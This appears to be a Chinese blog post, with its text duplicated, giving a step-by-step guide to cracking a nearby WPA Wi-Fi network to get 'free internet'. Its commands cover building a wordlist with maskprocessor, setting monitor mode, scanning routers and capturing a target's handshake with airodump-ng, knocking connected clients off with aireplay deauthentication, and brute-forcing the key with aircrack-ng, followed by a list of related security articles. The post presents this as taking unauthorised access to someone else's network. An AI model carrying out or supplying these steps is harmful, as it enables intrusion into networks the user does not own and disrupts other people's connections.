记一次电脑没网络,使用wireless获取“免费上网权限”
2015-08-30 00:37
686 查看
介绍一下操作环境
本机操作 系统centos 7.0
内核版本 kernel 3.10.0
电脑配置 酷睿i7 4GB
软件需求
aircrack-ng-1.2.rmp
maskprocessor-master
wireless_tools.29
我来说一下操作步骤
maskprocessor-master
unzip maskXXX ./
cd maskXXX
cd src
mp64.bin 后面跟你想写的字典(./mp.64 --help)
?l;?d;?u;?s;?a;?b分别代表五中不同的字符
ok,我们的字典写好了。
(貌似字典这种东西你要是懒得话,去随便下一个?)
接下来
cd wireless_tools.29
make&&makeinstall
(在这个时候我遇见一个问题,他说我没有链接库,把里面的libiw.so与libiw.so.29放到/lib下面问题解决)
然后就玩真的了
首先把aircracker的rpm包装好
airodump-ng mom0我发现不行,老是报错提示mom0 is not a network interface
原谅我上一个问题没有搞定,发现这条指令就是让我无线网卡的mode变为 Monitor(这里你要注意看看自己的网卡是否支持monitor模式)
好吧我通过iwconfig eth0(无线网卡名) mode monitor完成了上面一个命令无法成功的任务
当然我出现了device or resource busy;我的做法是
ifconfig eth0 down
iwconfig eth0 mode monitor
ifconfig eth0 up
第一步搞定
接下来我们开始监听周围的路由设备
airodump-ng wls35u1
你需要留心的是bssid;ch;enc这三个值
现在你已经知道你附近的路由的频道啊,加密方式什么的
接下来我们就要抓目标路由的数据包
airodump-ng --bssid(就是你要抓取路由的bssid) -c(他所在的频道) -w(.cap文件的存放名字) (你的无线网卡)
ok,在你抓包的时候呢,你需要做些帮助它(拔苗助长?)
aireplay -0 10 -a (抓取路由的bssid)-c(链接在路由器上的客户端的station)(你的无线网卡)
完成了上述的步骤,你会发现一个.cap文件,这时候你所要做的就是解析这个文件了
aircracker-ng -a 2 -b (路由的bssid) -w (之前刚开始准备的字典文件) (.cap文件)
如果提示没有找到,你就重复aireplay那条命令;知道aircracker这条命令开始读取
最后你就会得到你想要的
http://download.csdn.net/detail/u012839187/9142461
这个是我自己写的视频总结
本机操作 系统centos 7.0
内核版本 kernel 3.10.0
电脑配置 酷睿i7 4GB
软件需求
aircrack-ng-1.2.rmp
maskprocessor-master
wireless_tools.29
我来说一下操作步骤
maskprocessor-master
unzip maskXXX ./
cd maskXXX
cd src
mp64.bin 后面跟你想写的字典(./mp.64 --help)
?l;?d;?u;?s;?a;?b分别代表五中不同的字符
ok,我们的字典写好了。
(貌似字典这种东西你要是懒得话,去随便下一个?)
接下来
cd wireless_tools.29
make&&makeinstall
(在这个时候我遇见一个问题,他说我没有链接库,把里面的libiw.so与libiw.so.29放到/lib下面问题解决)
然后就玩真的了
首先把aircracker的rpm包装好
airodump-ng mom0我发现不行,老是报错提示mom0 is not a network interface
原谅我上一个问题没有搞定,发现这条指令就是让我无线网卡的mode变为 Monitor(这里你要注意看看自己的网卡是否支持monitor模式)
好吧我通过iwconfig eth0(无线网卡名) mode monitor完成了上面一个命令无法成功的任务
当然我出现了device or resource busy;我的做法是
ifconfig eth0 down
iwconfig eth0 mode monitor
ifconfig eth0 up
第一步搞定
接下来我们开始监听周围的路由设备
airodump-ng wls35u1
你需要留心的是bssid;ch;enc这三个值
现在你已经知道你附近的路由的频道啊,加密方式什么的
接下来我们就要抓目标路由的数据包
airodump-ng --bssid(就是你要抓取路由的bssid) -c(他所在的频道) -w(.cap文件的存放名字) (你的无线网卡)
ok,在你抓包的时候呢,你需要做些帮助它(拔苗助长?)
aireplay -0 10 -a (抓取路由的bssid)-c(链接在路由器上的客户端的station)(你的无线网卡)
完成了上述的步骤,你会发现一个.cap文件,这时候你所要做的就是解析这个文件了
aircracker-ng -a 2 -b (路由的bssid) -w (之前刚开始准备的字典文件) (.cap文件)
如果提示没有找到,你就重复aireplay那条命令;知道aircracker这条命令开始读取
最后你就会得到你想要的
http://download.csdn.net/detail/u012839187/9142461
这个是我自己写的视频总结
相关文章推荐
- 新御剑1.5注入版(11.29)
- 80sec被黑原因分析
- 网络安全助手 - 御剑
- 突破”子网隔离”***C段
- 网上说是"最标准的SQL注入语句"
- 转自CISPS《十年安全售前的经验与大家分享》
- 2007年世界顶级杀毒软件排名
- 玩转几大***测试系统
- 如何借助Sniffer来诊断Linux网络故障?
- 常用Linux网络安全工具
- CIO的网络安全“三大纪律”
- 国际网络信息安全认证中心
- ***常用***手段揭秘及其预防措施介绍
- 无线网络以及安全资源
- netfilter/iptables全攻略
- [转]网络安全设备Bypass功能介绍及分析 - [网络编程]
- 互联网企业网络安全架构摘录(转)
- 互联网企业网络安全架构(摘录)
- SSH:加密传输 远程管理的安全通道
- 新手该如何对服务器安全维护